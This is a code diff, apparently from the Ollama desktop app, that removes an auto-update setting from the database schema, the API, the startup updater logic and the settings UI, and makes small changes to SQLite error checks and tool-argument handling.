|
||||||
}()
|
}()
|
||||||
|
|
||||||
upd.StartBackgroundUpdaterChecker(ctx, UpdateAvailable)
|
updater := &updater.Updater{Store: st}
|
||||||
|
updater.StartBackgroundUpdaterChecker(ctx, UpdateAvailable)
|
||||||
// Check for pending updates on startup (show tray notification if update is ready)
|
|
||||||
if updater.IsUpdatePending() {
|
|
||||||
slog.Debug("update pending on startup, showing tray notification")
|
|
||||||
UpdateAvailable("")
|
|
||||||
}
|
|
||||||
|
|
||||||
hasCompletedFirstRun, err := st.HasCompletedFirstRun()
|
hasCompletedFirstRun, err := st.HasCompletedFirstRun()
|
||||||
if err != nil {
|
if err != nil {
|
||||||
|
|
@ -359,18 +348,6 @@ func startHiddenTasks() {
|
||||||
// CLI triggered app startup use-case
|
// CLI triggered app startup use-case
|
||||||
slog.Info("deferring pending update for fast startup")
|
slog.Info("deferring pending update for fast startup")
|
||||||
} else {
|
} else {
|
||||||
// Check if auto-update is enabled before automatically upgrading
|
|
||||||
st := &store.Store{}
|
|
||||||
settings, err := st.Settings()
|
|
||||||
if err != nil {
|
|
||||||
slog.Warn("failed to load settings for upgrade check", "error", err)
|
|
||||||
} else if !settings.AutoUpdateEnabled {
|
|
||||||
slog.Info("auto-update disabled, skipping automatic upgrade at startup")
|
|
||||||
// Still show tray notification so user knows update is ready
|
|
||||||
UpdateAvailable("")
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
if err := updater.DoUpgradeAtStartup(); err != nil {
|
if err := updater.DoUpgradeAtStartup(); err != nil {
|
||||||
slog.Info("unable to perform upgrade at startup", "error", err)
|
slog.Info("unable to perform upgrade at startup", "error", err)
|
||||||
// Make sure the restart to upgrade menu shows so we can attempt an interactive upgrade to get authorization
|
// Make sure the restart to upgrade menu shows so we can attempt an interactive upgrade to get authorization
|
||||||
|
|
|
||||||
|
|
@ -157,10 +157,6 @@ func UpdateAvailable(ver string) error {
|
||||||
return app.t.UpdateAvailable(ver)
|
return app.t.UpdateAvailable(ver)
|
||||||
}
|
}
|
||||||
|
|
||||||
func ClearUpdateAvailable() error {
|
|
||||||
return app.t.ClearUpdateAvailable()
|
|
||||||
}
|
|
||||||
|
|
||||||
func osRun(shutdown func(), hasCompletedFirstRun, startHidden bool) {
|
func osRun(shutdown func(), hasCompletedFirstRun, startHidden bool) {
|
||||||
var err error
|
var err error
|
||||||
app.shutdown = shutdown
|
app.shutdown = shutdown
|
||||||
|
|
|
||||||
|
|
@ -9,12 +9,12 @@ import (
|
||||||
"strings"
|
"strings"
|
||||||
"time"
|
"time"
|
||||||
|
|
||||||
_ "github.com/mattn/go-sqlite3"
|
sqlite3 "github.com/mattn/go-sqlite3"
|
||||||
)
|
)
|
||||||
|
|
||||||
// currentSchemaVersion defines the current database schema version.
|
// currentSchemaVersion defines the current database schema version.
|
||||||
// Increment this when making schema changes that require migrations.
|
// Increment this when making schema changes that require migrations.
|
||||||
const currentSchemaVersion = 13
|
const currentSchemaVersion = 12
|
||||||
|
|
||||||
// database wraps the SQLite connection.
|
// database wraps the SQLite connection.
|
||||||
// SQLite handles its own locking for concurrent access:
|
// SQLite handles its own locking for concurrent access:
|
||||||
|
|
@ -85,7 +85,6 @@ func (db *database) init() error {
|
||||||
think_enabled BOOLEAN NOT NULL DEFAULT 0,
|
think_enabled BOOLEAN NOT NULL DEFAULT 0,
|
||||||
think_level TEXT NOT NULL DEFAULT '',
|
think_level TEXT NOT NULL DEFAULT '',
|
||||||
remote TEXT NOT NULL DEFAULT '', -- deprecated
|
remote TEXT NOT NULL DEFAULT '', -- deprecated
|
||||||
auto_update_enabled BOOLEAN NOT NULL DEFAULT 1,
|
|
||||||
schema_version INTEGER NOT NULL DEFAULT %d
|
schema_version INTEGER NOT NULL DEFAULT %d
|
||||||
);
|
);
|
||||||
|
|
||||||
|
|
@ -245,12 +244,6 @@ func (db *database) migrate() error {
|
||||||
return fmt.Errorf("migrate v11 to v12: %w", err)
|
return fmt.Errorf("migrate v11 to v12: %w", err)
|
||||||
}
|
}
|
||||||
version = 12
|
version = 12
|
||||||
case 12:
|
|
||||||
// add auto_update_enabled column to settings table
|
|
||||||
if err := db.migrateV12ToV13(); err != nil {
|
|
||||||
return fmt.Errorf("migrate v12 to v13: %w", err)
|
|
||||||
}
|
|
||||||
version = 13
|
|
||||||
default:
|
default:
|
||||||
// If we have a version we don't recognize, just set it to current
|
// If we have a version we don't recognize, just set it to current
|
||||||
// This might happen during development
|
// This might happen during development
|
||||||
|
|
@ -459,21 +452,6 @@ func (db *database) migrateV11ToV12() error {
|
||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
// migrateV12ToV13 adds the auto_update_enabled column to the settings table
|
|
||||||
func (db *database) migrateV12ToV13() error {
|
|
||||||
_, err := db.conn.Exec(`ALTER TABLE settings ADD COLUMN auto_update_enabled BOOLEAN NOT NULL DEFAULT 1`)
|
|
||||||
if err != nil && !duplicateColumnError(err) {
|
|
||||||
return fmt.Errorf("add auto_update_enabled column: %w", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
_, err = db.conn.Exec(`UPDATE settings SET schema_version = 13`)
|
|
||||||
if err != nil {
|
|
||||||
return fmt.Errorf("update schema version: %w", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
return nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// cleanupOrphanedData removes orphaned records that may exist due to the foreign key bug
|
// cleanupOrphanedData removes orphaned records that may exist due to the foreign key bug
|
||||||
func (db *database) cleanupOrphanedData() error {
|
func (db *database) cleanupOrphanedData() error {
|
||||||
_, err := db.conn.Exec(`
|
_, err := db.conn.Exec(`
|
||||||
|
|
@ -504,11 +482,19 @@ func (db *database) cleanupOrphanedData() error {
|
||||||
}
|
}
|
||||||
|
|
||||||
func duplicateColumnError(err error) bool {
|
func duplicateColumnError(err error) bool {
|
||||||
return err != nil && strings.Contains(err.Error(), "duplicate column name")
|
if sqlite3Err, ok := err.(sqlite3.Error); ok {
|
||||||
|
return sqlite3Err.Code == sqlite3.ErrError &&
|
||||||
|
strings.Contains(sqlite3Err.Error(), "duplicate column name")
|
||||||
|
}
|
||||||
|
return false
|
||||||
}
|
}
|
||||||
|
|
||||||
func columnNotExists(err error) bool {
|
func columnNotExists(err error) bool {
|
||||||
return err != nil && strings.Contains(err.Error(), "no such column")
|
if sqlite3Err, ok := err.(sqlite3.Error); ok {
|
||||||
|
return sqlite3Err.Code == sqlite3.ErrError &&
|
||||||
|
strings.Contains(sqlite3Err.Error(), "no such column")
|
||||||
|
}
|
||||||
|
return false
|
||||||
}
|
}
|
||||||
|
|
||||||
func (db *database) getAllChats() ([]Chat, error) {
|
func (db *database) getAllChats() ([]Chat, error) {
|
||||||
|
|
@ -1122,9 +1108,9 @@ func (db *database) getSettings() (Settings, error) {
|
||||||
var s Settings
|
var s Settings
|
||||||
|
|
||||||
err := db.conn.QueryRow(`
|
err := db.conn.QueryRow(`
|
||||||
SELECT expose, survey, browser, models, agent, tools, working_dir, context_length, airplane_mode, turbo_enabled, websearch_enabled, selected_model, sidebar_open, think_enabled, think_level, auto_update_enabled
|
SELECT expose, survey, browser, models, agent, tools, working_dir, context_length, airplane_mode, turbo_enabled, websearch_enabled, selected_model, sidebar_open, think_enabled, think_level
|
||||||
FROM settings
|
FROM settings
|
||||||
`).Scan(&s.Expose, &s.Survey, &s.Browser, &s.Models, &s.Agent, &s.Tools, &s.WorkingDir, &s.ContextLength, &s.AirplaneMode, &s.TurboEnabled, &s.WebSearchEnabled, &s.SelectedModel, &s.SidebarOpen, &s.ThinkEnabled, &s.ThinkLevel, &s.AutoUpdateEnabled)
|
`).Scan(&s.Expose, &s.Survey, &s.Browser, &s.Models, &s.Agent, &s.Tools, &s.WorkingDir, &s.ContextLength, &s.AirplaneMode, &s.TurboEnabled, &s.WebSearchEnabled, &s.SelectedModel, &s.SidebarOpen, &s.ThinkEnabled, &s.ThinkLevel)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return Settings{}, fmt.Errorf("get settings: %w", err)
|
return Settings{}, fmt.Errorf("get settings: %w", err)
|
||||||
}
|
}
|
||||||
|
|
@ -1135,8 +1121,8 @@ func (db *database) getSettings() (Settings, error) {
|
||||||
func (db *database) setSettings(s Settings) error {
|
func (db *database) setSettings(s Settings) error {
|
||||||
_, err := db.conn.Exec(`
|
_, err := db.conn.Exec(`
|
||||||
UPDATE settings
|
UPDATE settings
|
||||||
SET expose = ?, survey = ?, browser = ?, models = ?, agent = ?, tools = ?, working_dir = ?, context_length = ?, airplane_mode = ?, turbo_enabled = ?, websearch_enabled = ?, selected_model = ?, sidebar_open = ?, think_enabled = ?, think_level = ?, auto_update_enabled = ?
|
SET expose = ?, survey = ?, browser = ?, models = ?, agent = ?, tools = ?, working_dir = ?, context_length = ?, airplane_mode = ?, turbo_enabled = ?, websearch_enabled = ?, selected_model = ?, sidebar_open = ?, think_enabled = ?, think_level = ?
|
||||||
`, s.Expose, s.Survey, s.Browser, s.Models, s.Agent, s.Tools, s.WorkingDir, s.ContextLength, s.AirplaneMode, s.TurboEnabled, s.WebSearchEnabled, s.SelectedModel, s.SidebarOpen, s.ThinkEnabled, s.ThinkLevel, s.AutoUpdateEnabled)
|
`, s.Expose, s.Survey, s.Browser, s.Models, s.Agent, s.Tools, s.WorkingDir, s.ContextLength, s.AirplaneMode, s.TurboEnabled, s.WebSearchEnabled, s.SelectedModel, s.SidebarOpen, s.ThinkEnabled, s.ThinkLevel)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return fmt.Errorf("set settings: %w", err)
|
return fmt.Errorf("set settings: %w", err)
|
||||||
}
|
}
|
||||||
|
|
|
||||||
|
|
@ -169,9 +169,6 @@ type Settings struct {
|
||||||
|
|
||||||
// SidebarOpen indicates if the chat sidebar is open
|
// SidebarOpen indicates if the chat sidebar is open
|
||||||
SidebarOpen bool
|
SidebarOpen bool
|
||||||
|
|
||||||
// AutoUpdateEnabled indicates if automatic updates should be downloaded
|
|
||||||
AutoUpdateEnabled bool
|
|
||||||
}
|
}
|
||||||
|
|
||||||
type Store struct {
|
type Store struct {
|
||||||
|
|
|
||||||
|
|
@ -413,7 +413,6 @@ export class Settings {
|
||||||
ThinkLevel: string;
|
ThinkLevel: string;
|
||||||
SelectedModel: string;
|
SelectedModel: string;
|
||||||
SidebarOpen: boolean;
|
SidebarOpen: boolean;
|
||||||
AutoUpdateEnabled: boolean;
|
|
||||||
|
|
||||||
constructor(source: any = {}) {
|
constructor(source: any = {}) {
|
||||||
if ('string' === typeof source) source = JSON.parse(source);
|
if ('string' === typeof source) source = JSON.parse(source);
|
||||||
|
|
@ -432,7 +431,6 @@ export class Settings {
|
||||||
this.ThinkLevel = source["ThinkLevel"];
|
this.ThinkLevel = source["ThinkLevel"];
|
||||||
this.SelectedModel = source["SelectedModel"];
|
this.SelectedModel = source["SelectedModel"];
|
||||||
this.SidebarOpen = source["SidebarOpen"];
|
this.SidebarOpen = source["SidebarOpen"];
|
||||||
this.AutoUpdateEnabled = source["AutoUpdateEnabled"];
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
export class SettingsResponse {
|
export class SettingsResponse {
|
||||||
|
|
@ -469,46 +467,6 @@ export class HealthResponse {
|
||||||
this.healthy = source["healthy"];
|
this.healthy = source["healthy"];
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
export class UpdateInfo {
|
|
||||||
currentVersion: string;
|
|
||||||
availableVersion: string;
|
|
||||||
updateAvailable: boolean;
|
|
||||||
updateDownloaded: boolean;
|
|
||||||
|
|
||||||
constructor(source: any = {}) {
|
|
||||||
if ('string' === typeof source) source = JSON.parse(source);
|
|
||||||
this.currentVersion = source["currentVersion"];
|
|
||||||
this.availableVersion = source["availableVersion"];
|
|
||||||
this.updateAvailable = source["updateAvailable"];
|
|
||||||
this.updateDownloaded = source["updateDownloaded"];
|
|
||||||
}
|
|
||||||
}
|
|
||||||
export class UpdateCheckResponse {
|
|
||||||
updateInfo: UpdateInfo;
|
|
||||||
|
|
||||||
constructor(source: any = {}) {
|
|
||||||
if ('string' === typeof source) source = JSON.parse(source);
|
|
||||||
this.updateInfo = this.convertValues(source["updateInfo"], UpdateInfo);
|
|
||||||
}
|
|
||||||
|
|
||||||
convertValues(a: any, classs: any, asMap: boolean = false): any {
|
|
||||||
if (!a) {
|
|
||||||
return a;
|
|
||||||
}
|
|
||||||
if (Array.isArray(a)) {
|
|
||||||
return (a as any[]).map(elem => this.convertValues(elem, classs));
|
|
||||||
} else if ("object" === typeof a) {
|
|
||||||
if (asMap) {
|
|
||||||
for (const key of Object.keys(a)) {
|
|
||||||
a[key] = new classs(a[key]);
|
|
||||||
}
|
|
||||||
return a;
|
|
||||||
}
|
|
||||||
return new classs(a);
|
|
||||||
}
|
|
||||||
return a;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
export class User {
|
export class User {
|
||||||
id: string;
|
id: string;
|
||||||
email: string;
|
email: string;
|
||||||
|
|
|
||||||
|
|
@ -414,54 +414,3 @@ export async function fetchHealth(): Promise<boolean> {
|
||||||
return false;
|
return false;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
export async function getCurrentVersion(): Promise<string> {
|
|
||||||
try {
|
|
||||||
const response = await fetch(`${API_BASE}/api/version`, {
|
|
||||||
method: "GET",
|
|
||||||
headers: {
|
|
||||||
"Content-Type": "application/json",
|
|
||||||
},
|
|
||||||
});
|
|
||||||
if (response.ok) {
|
|
||||||
const data = await response.json();
|
|
||||||
return data.version || "Unknown";
|
|
||||||
}
|
|
||||||
return "Unknown";
|
|
||||||
} catch (error) {
|
|
||||||
console.error("Error fetching version:", error);
|
|
||||||
return "Unknown";
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
export async function checkForUpdate(): Promise<{
|
|
||||||
currentVersion: string;
|
|
||||||
availableVersion: string;
|
|
||||||
updateAvailable: boolean;
|
|
||||||
updateDownloaded: boolean;
|
|
||||||
}> {
|
|
||||||
const response = await fetch(`${API_BASE}/api/v1/update/check`, {
|
|
||||||
method: "GET",
|
|
||||||
headers: {
|
|
||||||
"Content-Type": "application/json",
|
|
||||||
},
|
|
||||||
});
|
|
||||||
if (!response.ok) {
|
|
||||||
throw new Error("Failed to check for update");
|
|
||||||
}
|
|
||||||
const data = await response.json();
|
|
||||||
return data.updateInfo;
|
|
||||||
}
|
|
||||||
|
|
||||||
export async function installUpdate(): Promise<void> {
|
|
||||||
const response = await fetch(`${API_BASE}/api/v1/update/install`, {
|
|
||||||
method: "POST",
|
|
||||||
headers: {
|
|
||||||
"Content-Type": "application/json",
|
|
||||||
},
|
|
||||||
});
|
|
||||||
if (!response.ok) {
|
|
||||||
const error = await response.text();
|
|
||||||
throw new Error(error || "Failed to install update");
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
|
||||||
|
|
@ -14,13 +14,12 @@ import {
|
||||||
XMarkIcon,
|
XMarkIcon,
|
||||||
CogIcon,
|
CogIcon,
|
||||||
ArrowLeftIcon,
|
ArrowLeftIcon,
|
||||||
ArrowDownTrayIcon,
|
|
||||||
} from "@heroicons/react/20/solid";
|
} from "@heroicons/react/20/solid";
|
||||||
import { Settings as SettingsType } from "@/gotypes";
|
import { Settings as SettingsType } from "@/gotypes";
|
||||||
import { useNavigate } from "@tanstack/react-router";
|
import { useNavigate } from "@tanstack/react-router";
|
||||||
import { useUser } from "@/hooks/useUser";
|
import { useUser } from "@/hooks/useUser";
|
||||||
import { useQuery, useMutation, useQueryClient } from "@tanstack/react-query";
|
import { useQuery, useMutation, useQueryClient } from "@tanstack/react-query";
|
||||||
import { getSettings, updateSettings, checkForUpdate } from "@/api";
|
import { getSettings, updateSettings } from "@/api";
|
||||||
|
|
||||||
function AnimatedDots() {
|
function AnimatedDots() {
|
||||||
return (
|
return (
|
||||||
|
|
@ -40,12 +39,6 @@ export default function Settings() {
|
||||||
const queryClient = useQueryClient();
|
const queryClient = useQueryClient();
|
||||||
const [showSaved, setShowSaved] = useState(false);
|
const [showSaved, setShowSaved] = useState(false);
|
||||||
const [restartMessage, setRestartMessage] = useState(false);
|
const [restartMessage, setRestartMessage] = useState(false);
|
||||||
const [updateInfo, setUpdateInfo] = useState<{
|
|
||||||
currentVersion: string;
|
|
||||||
availableVersion: string;
|
|
||||||
updateAvailable: boolean;
|
|
||||||
updateDownloaded: boolean;
|
|
||||||
} | null>(null);
|
|
||||||
const {
|
const {
|
||||||
user,
|
user,
|
||||||
isAuthenticated,
|
isAuthenticated,
|
||||||
|
|
@ -83,22 +76,8 @@ export default function Settings() {
|
||||||
|
|
||||||
useEffect(() => {
|
useEffect(() => {
|
||||||
refetchUser();
|
refetchUser();
|
||||||
// Check for updates
|
|
||||||
checkForUpdate()
|
|
||||||
.then(setUpdateInfo)
|
|
||||||
.catch((err) => console.error("Error checking for update:", err));
|
|
||||||
}, []); // eslint-disable-line react-hooks/exhaustive-deps
|
}, []); // eslint-disable-line react-hooks/exhaustive-deps
|
||||||
|
|
||||||
// Refresh update info when auto-update toggle changes
|
|
||||||
useEffect(() => {
|
|
||||||
if (settings?.AutoUpdateEnabled !== undefined) {
|
|
||||||
checkForUpdate()
|
|
||||||
.then(setUpdateInfo)
|
|
||||||
.catch((err) => console.error("Error checking for update:", err));
|
|
||||||
}
|
|
||||||
}, [settings?.AutoUpdateEnabled]);
|
|
||||||
|
|
||||||
|
|
||||||
useEffect(() => {
|
useEffect(() => {
|
||||||
const handleFocus = () => {
|
const handleFocus = () => {
|
||||||
if (isAwaitingConnection && pollingInterval) {
|
if (isAwaitingConnection && pollingInterval) {
|
||||||
|
|
@ -365,58 +344,6 @@ export default function Settings() {
|
||||||
{/* Local Configuration */}
|
{/* Local Configuration */}
|
||||||
<div className="relative overflow-hidden rounded-xl bg-white dark:bg-neutral-800">
|
<div className="relative overflow-hidden rounded-xl bg-white dark:bg-neutral-800">
|
||||||
<div className="space-y-4 p-4">
|
<div className="space-y-4 p-4">
|
||||||
{/* Auto Update */}
|
|
||||||
<Field>
|
|
||||||
<div className="flex items-start justify-between gap-4">
|
|
||||||
<div className="flex items-start space-x-3 flex-1">
|
|
||||||
<ArrowDownTrayIcon className="mt-1 h-5 w-5 flex-shrink-0 text-black dark:text-neutral-100" />
|
|
||||||
<div className="flex-1">
|
|
||||||
<Label>Auto-download updates</Label>
|
|
||||||
<Description>
|
|
||||||
{settings.AutoUpdateEnabled ? (
|
|
||||||
<>
|
|
||||||
Automatically downloads updates when available.
|
|
||||||
<div className="mt-2 text-xs text-zinc-600 dark:text-zinc-400">
|
|
||||||
Current version: {updateInfo?.currentVersion || "Loading..."}
|
|
||||||
</div>
|
|
||||||
</>
|
|
||||||
) : (
|
|
||||||
<>
|
|
||||||
Manually download updates.
|
|
||||||
<div className="mt-3 p-3 bg-zinc-50 dark:bg-zinc-900 rounded-lg border border-zinc-200 dark:border-zinc-800">
|
|
||||||
<div className="space-y-2 text-sm">
|
|
||||||
<div className="flex justify-between">
|
|
||||||
<span className="text-zinc-600 dark:text-zinc-400">Current version: {updateInfo?.currentVersion || "Loading..."}</span>
|
|
||||||
</div>
|
|
||||||
{updateInfo?.availableVersion && (
|
|
||||||
<div className="flex justify-between">
|
|
||||||
<span className="text-zinc-600 dark:text-zinc-400">Available version: {updateInfo?.availableVersion}</span>
|
|
||||||
</div>
|
|
||||||
)}
|
|
||||||
</div>
|
|
||||||
<a
|
|
||||||
href="https://ollama.com/download"
|
|
||||||
target="_blank"
|
|
||||||
rel="noopener noreferrer"
|
|
||||||
className="mt-3 inline-block text-sm text-neutral-600 dark:text-neutral-400 underline"
|
|
||||||
>
|
|
||||||
Download new version →
|
|
||||||
</a>
|
|
||||||
</div>
|
|
||||||
</>
|
|
||||||
)}
|
|
||||||
</Description>
|
|
||||||
</div>
|
|
||||||
</div>
|
|
||||||
<div className="flex-shrink-0">
|
|
||||||
<Switch
|
|
||||||
checked={settings.AutoUpdateEnabled}
|
|
||||||
onChange={(checked) => handleChange("AutoUpdateEnabled", checked)}
|
|
||||||
/>
|
|
||||||
</div>
|
|
||||||
</div>
|
|
||||||
</Field>
|
|
||||||
|
|
||||||
{/* Expose Ollama */}
|
{/* Expose Ollama */}
|
||||||
<Field>
|
<Field>
|
||||||
<div className="flex items-start justify-between gap-4">
|
<div className="flex items-start justify-between gap-4">
|
||||||
|
|
|
||||||
|
|
@ -100,17 +100,6 @@ type HealthResponse struct {
|
||||||
Healthy bool `json:"healthy"`
|
Healthy bool `json:"healthy"`
|
||||||
}
|
}
|
||||||
|
|
||||||
type UpdateInfo struct {
|
|
||||||
CurrentVersion string `json:"currentVersion"`
|
|
||||||
AvailableVersion string `json:"availableVersion"`
|
|
||||||
UpdateAvailable bool `json:"updateAvailable"`
|
|
||||||
UpdateDownloaded bool `json:"updateDownloaded"`
|
|
||||||
}
|
|
||||||
|
|
||||||
type UpdateCheckResponse struct {
|
|
||||||
UpdateInfo UpdateInfo `json:"updateInfo"`
|
|
||||||
}
|
|
||||||
|
|
||||||
type User struct {
|
type User struct {
|
||||||
ID string `json:"id"`
|
ID string `json:"id"`
|
||||||
Email string `json:"email"`
|
Email string `json:"email"`
|
||||||
|
|
|
||||||
108
app/ui/ui.go
108
app/ui/ui.go
|
|
@ -28,7 +28,6 @@ import (
|
||||||
"github.com/ollama/ollama/app/tools"
|
"github.com/ollama/ollama/app/tools"
|
||||||
"github.com/ollama/ollama/app/types/not"
|
"github.com/ollama/ollama/app/types/not"
|
||||||
"github.com/ollama/ollama/app/ui/responses"
|
"github.com/ollama/ollama/app/ui/responses"
|
||||||
"github.com/ollama/ollama/app/updater"
|
|
||||||
"github.com/ollama/ollama/app/version"
|
"github.com/ollama/ollama/app/version"
|
||||||
ollamaAuth "github.com/ollama/ollama/auth"
|
ollamaAuth "github.com/ollama/ollama/auth"
|
||||||
"github.com/ollama/ollama/envconfig"
|
"github.com/ollama/ollama/envconfig"
|
||||||
|
|
@ -107,18 +106,6 @@ type Server struct {
|
||||||
|
|
||||||
// Dev is true if the server is running in development mode
|
// Dev is true if the server is running in development mode
|
||||||
Dev bool
|
Dev bool
|
||||||
|
|
||||||
// Updater for checking and downloading updates
|
|
||||||
Updater UpdaterInterface
|
|
||||||
UpdateAvailableFunc func()
|
|
||||||
}
|
|
||||||
|
|
||||||
// UpdaterInterface defines the methods we need from the updater
|
|
||||||
type UpdaterInterface interface {
|
|
||||||
CheckForUpdate(ctx context.Context) (bool, string, error)
|
|
||||||
InstallAndRestart() error
|
|
||||||
CancelOngoingDownload()
|
|
||||||
TriggerImmediateCheck()
|
|
||||||
}
|
}
|
||||||
|
|
||||||
func (s *Server) log() *slog.Logger {
|
func (s *Server) log() *slog.Logger {
|
||||||
|
|
@ -297,8 +284,6 @@ func (s *Server) Handler() http.Handler {
|
||||||
mux.Handle("POST /api/v1/model/upstream", handle(s.modelUpstream))
|
mux.Handle("POST /api/v1/model/upstream", handle(s.modelUpstream))
|
||||||
mux.Handle("GET /api/v1/settings", handle(s.getSettings))
|
mux.Handle("GET /api/v1/settings", handle(s.getSettings))
|
||||||
mux.Handle("POST /api/v1/settings", handle(s.settings))
|
mux.Handle("POST /api/v1/settings", handle(s.settings))
|
||||||
mux.Handle("GET /api/v1/update/check", handle(s.checkForUpdate))
|
|
||||||
mux.Handle("POST /api/v1/update/install", handle(s.installUpdate))
|
|
||||||
|
|
||||||
// Ollama proxy endpoints
|
// Ollama proxy endpoints
|
||||||
ollamaProxy := s.ollamaProxy()
|
ollamaProxy := s.ollamaProxy()
|
||||||
|
|
@ -1012,7 +997,7 @@ func (s *Server) chat(w http.ResponseWriter, r *http.Request) error {
|
||||||
for _, toolCall := range res.Message.ToolCalls {
|
for _, toolCall := range res.Message.ToolCalls {
|
||||||
// continues loop as tools were executed
|
// continues loop as tools were executed
|
||||||
toolsExecuted = true
|
toolsExecuted = true
|
||||||
result, content, err := registry.Execute(ctx, toolCall.Function.Name, toolCall.Function.Arguments)
|
result, content, err := registry.Execute(ctx, toolCall.Function.Name, toolCall.Function.Arguments.ToMap())
|
||||||
if err != nil {
|
if err != nil {
|
||||||
errContent := fmt.Sprintf("Error: %v", err)
|
errContent := fmt.Sprintf("Error: %v", err)
|
||||||
toolErrMsg := store.NewMessage("tool", errContent, nil)
|
toolErrMsg := store.NewMessage("tool", errContent, nil)
|
||||||
|
|
@ -1463,24 +1448,6 @@ func (s *Server) settings(w http.ResponseWriter, r *http.Request) error {
|
||||||
return fmt.Errorf("failed to save settings: %w", err)
|
return fmt.Errorf("failed to save settings: %w", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
// Handle auto-update toggle changes
|
|
||||||
if old.AutoUpdateEnabled != settings.AutoUpdateEnabled {
|
|
||||||
if !settings.AutoUpdateEnabled {
|
|
||||||
// Auto-update disabled: cancel any ongoing download
|
|
||||||
if s.Updater != nil {
|
|
||||||
s.Updater.CancelOngoingDownload()
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
// Auto-update re-enabled: show notification if update is already staged, or trigger immediate check
|
|
||||||
if (updater.IsUpdatePending() || updater.UpdateDownloaded) && s.UpdateAvailableFunc != nil {
|
|
||||||
s.UpdateAvailableFunc()
|
|
||||||
} else if s.Updater != nil {
|
|
||||||
// Trigger the background checker to run immediately
|
|
||||||
s.Updater.TriggerImmediateCheck()
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
if old.ContextLength != settings.ContextLength ||
|
if old.ContextLength != settings.ContextLength ||
|
||||||
old.Models != settings.Models ||
|
old.Models != settings.Models ||
|
||||||
old.Expose != settings.Expose {
|
old.Expose != settings.Expose {
|
||||||
|
|
@ -1557,73 +1524,6 @@ func (s *Server) modelUpstream(w http.ResponseWriter, r *http.Request) error {
|
||||||
return json.NewEncoder(w).Encode(response)
|
return json.NewEncoder(w).Encode(response)
|
||||||
}
|
}
|
||||||
|
|
||||||
func (s *Server) checkForUpdate(w http.ResponseWriter, r *http.Request) error {
|
|
||||||
currentVersion := version.Version
|
|
||||||
|
|
||||||
if s.Updater == nil {
|
|
||||||
return fmt.Errorf("updater not available")
|
|
||||||
}
|
|
||||||
|
|
||||||
updateAvailable, updateVersion, err := s.Updater.CheckForUpdate(r.Context())
|
|
||||||
if err != nil {
|
|
||||||
s.log().Warn("failed to check for update", "error", err)
|
|
||||||
// Don't return error, just log it and continue with no update available
|
|
||||||
}
|
|
||||||
|
|
||||||
response := responses.UpdateCheckResponse{
|
|
||||||
UpdateInfo: responses.UpdateInfo{
|
|
||||||
CurrentVersion: currentVersion,
|
|
||||||
AvailableVersion: updateVersion,
|
|
||||||
UpdateAvailable: updateAvailable,
|
|
||||||
UpdateDownloaded: updater.UpdateDownloaded,
|
|
||||||
},
|
|
||||||
}
|
|
||||||
|
|
||||||
w.Header().Set("Content-Type", "application/json")
|
|
||||||
return json.NewEncoder(w).Encode(response)
|
|
||||||
}
|
|
||||||
|
|
||||||
func (s *Server) installUpdate(w http.ResponseWriter, r *http.Request) error {
|
|
||||||
if r.Method != "POST" {
|
|
||||||
return fmt.Errorf("method not allowed")
|
|
||||||
}
|
|
||||||
|
|
||||||
if s.Updater == nil {
|
|
||||||
s.log().Error("install failed: updater not available")
|
|
||||||
return fmt.Errorf("updater not available")
|
|
||||||
}
|
|
||||||
|
|
||||||
// Check if update is downloaded
|
|
||||||
if !updater.UpdateDownloaded {
|
|
||||||
s.log().Error("install failed: no update downloaded")
|
|
||||||
return fmt.Errorf("no update downloaded")
|
|
||||||
}
|
|
||||||
|
|
||||||
// Send response before restarting
|
|
||||||
response := map[string]any{
|
|
||||||
"success": true,
|
|
||||||
"message": "Installing update and restarting...",
|
|
||||||
}
|
|
||||||
|
|
||||||
w.Header().Set("Content-Type", "application/json")
|
|
||||||
if err := json.NewEncoder(w).Encode(response); err != nil {
|
|
||||||
return err
|
|
||||||
}
|
|
||||||
|
|
||||||
// Give the response time to be sent
|
|
||||||
time.Sleep(500 * time.Millisecond)
|
|
||||||
|
|
||||||
// Trigger the upgrade and restart
|
|
||||||
go func() {
|
|
||||||
time.Sleep(500 * time.Millisecond)
|
|
||||||
if err := s.Updater.InstallAndRestart(); err != nil {
|
|
||||||
s.log().Error("failed to install update", "error", err)
|
|
||||||
}
|
|
||||||
}()
|
|
||||||
|
|
||||||
return nil
|
|
||||||
}
|
|
||||||
|
|
||||||
func userAgent() string {
|
func userAgent() string {
|
||||||
buildinfo, _ := debug.ReadBuildInfo()
|
buildinfo, _ := debug.ReadBuildInfo()
|
||||||
|
|
||||||
|
|
@ -1658,13 +1558,13 @@ func convertToOllamaTool(toolSchema map[string]any) api.Tool {
|
||||||
|
|
||||||
tool.Function.Parameters.Type = "object"
|
tool.Function.Parameters.Type = "object"
|
||||||
tool.Function.Parameters.Required = []string{}
|
tool.Function.Parameters.Required = []string{}
|
||||||
tool.Function.Parameters.Properties = make(map[string]api.ToolProperty)
|
tool.Function.Parameters.Properties = api.NewToolPropertiesMap()
|
||||||
|
|
||||||
if schemaProps, ok := toolSchema["schema"].(map[string]any); ok {
|
if schemaProps, ok := toolSchema["schema"].(map[string]any); ok {
|
||||||
tool.Function.Parameters.Type = getStringFromMap(schemaProps, "type", "object")
|
tool.Function.Parameters.Type = getStringFromMap(schemaProps, "type", "object")
|
||||||
|
|
||||||
if props, ok := schemaProps["properties"].(map[string]any); ok {
|
if props, ok := schemaProps["properties"].(map[string]any); ok {
|
||||||
tool.Function.Parameters.Properties = make(map[string]api.ToolProperty)
|
tool.Function.Parameters.Properties = api.NewToolPropertiesMap()
|
||||||
|
|
||||||
for propName, propDef := range props {
|
for propName, propDef := range props {
|
||||||
if propMap, ok := propDef.(map[string]any); ok {
|
